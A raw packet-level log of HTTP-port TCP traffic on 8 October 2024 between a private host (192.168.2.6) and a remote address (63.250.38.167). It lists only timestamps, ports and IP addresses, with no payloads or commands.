Oct 8, 2024 11:30:57.490247965 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.490263939 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.490319967 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.490319967 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.490379095 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.490412951 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.490431070 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.490463018 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.490526915 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.490550041 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.492373943 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.492408037 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.492494106 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.492508888 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.492526054 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.492551088 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.492567062 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.492579937 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.492579937 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.492579937 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.492619991 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.492635965 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.492651939 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.492667913 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.492683887 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.492702007 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.492712975 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.492712975 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.492729902 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.492739916 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.492757082 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.492790937 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.492806911 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.492872000 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.492887020 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.492902994 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.492933989 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.492933989 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.493015051 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.493431091 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.493458033 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.493474007 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.493489027 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.493503094 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.493541956 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.493541956 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.493571997 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.493587971 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.493602991 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.493618965 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.493633986 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.493649006 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.493664026 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.493676901 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.493676901 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.493678093 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.493706942 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.493747950 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.494214058 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.494237900 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.495006084 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.578157902 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.578361988 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.578377008 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.578392029 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.578408003 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.578424931 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.578442097 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.578457117 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.578470945 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.578485966 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.578485966 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.578486919 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.578512907 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.578528881 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.578543901 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.578558922 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.578573942 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.578589916 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.578618050 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.578618050 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.578619003 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.578619003 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.578905106 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.578963995 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.578986883 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.579003096 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.579019070 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.579032898 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.579032898 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.579108000 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.579299927 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.579323053 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.579339981 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.579355001 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.579380035 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.579406023 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.579406023 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.579437971 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.579453945 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.579468966 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.579484940 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.579500914 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.579516888 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.579546928 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.579546928 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.579546928 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.580045938 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.580120087 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.580136061 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.580152035 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.580185890 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.580187082 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.580229044 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.580245018 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.580261946 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.580277920 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.580293894 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.580391884 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.580391884 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.580391884 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.580678940 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.580701113 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.580717087 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.580749035 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.580760956 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.580775023 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.580790043 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.580813885 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.580831051 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.580846071 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.580867052 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.580877066 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.580877066 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.580904961 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.580920935 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.580936909 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.580972910 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.580972910 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.580972910 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.581650019 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.581768990 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.581806898 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.581830978 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.581846952 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.581861973 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.581876993 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.581892014 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.581907988 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.581923962 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.581935883 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.581935883 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.581935883 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.581965923 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.581980944 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.581995964 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.582012892 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.582098007 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.582098007 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.582098007 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.582734108 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.582777977 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.582802057 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.582818031 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.582834005 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.582849026 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.582865000 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.582880020 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.582895994 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.582907915 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.582907915 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.582907915 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.582937002 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.582952023 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.582967043 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.582983017 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.583046913 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.583046913 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.583046913 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.583610058 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.583626032 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.583642006 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.583657026 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.583683014 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.583698034 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.583714008 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.583728075 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.583743095 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.583743095 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.583743095 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.583772898 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.583787918 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.583803892 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.583820105 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.583836079 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.583877087 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.583877087 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.583877087 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.583877087 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.584558964 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.584582090 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.584599018 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.584614038 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.584629059 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.584688902 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.584688902 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.584738016 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.584753990 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.584767103 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.584783077 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.584805012 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.584816933 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.584816933 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.584832907 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.584849119 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.584866047 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.585246086 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.585246086 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.585433960 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.585479021 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.585491896 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.585525036 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.585556984 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.666752100 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.666810036 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.666827917 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.666838884 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.666848898 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.666855097 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.666861057 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.666871071 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.666881084 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.666891098 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.666901112 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.666913986 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.666929007 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.666939974 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.666948080 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.666955948 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.666955948 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.666955948 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.666977882 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.666990042 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667063951 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667073965 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667083025 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667104959 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.667104959 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.667104959 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.667135954 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667145967 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667156935 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667166948 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667176962 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667186975 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667205095 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667244911 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.667244911 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.667244911 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.667244911 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.667314053 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667324066 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667335033 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667346001 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667362928 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667372942 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667388916 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.667388916 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.667403936 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.667413950 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667426109 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667442083 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667452097 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667460918 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667469978 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667479992 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667490959 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667529106 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.667529106 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.667529106 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.667529106 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.667541981 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667550087 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667560101 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667570114 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667579889 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.667615891 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.667615891 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.667615891 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.668484926 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.668533087 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.668541908 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.668559074 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.668569088 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.668601036 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.668601036 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.668629885 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.668637991 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.668648005 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.668658018 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.668682098 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.668689013 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.668699026 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.668710947 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.668719053 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.668725014 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.668768883 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.668768883 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.671897888 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.671909094 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.671919107 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.671927929 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.671998978 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672008038 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672018051 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672063112 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.672063112 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.672063112 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.672063112 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.672074080 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672086000 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672100067 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672110081 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672118902 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672127962 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672139883 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672148943 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672158003 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672174931 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.672174931 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.672174931 CEST	49950	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:57.672230005 CEST	80	49950	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:57.672235966 CEST	49950	80	192.168.2.6	63.250.38.167
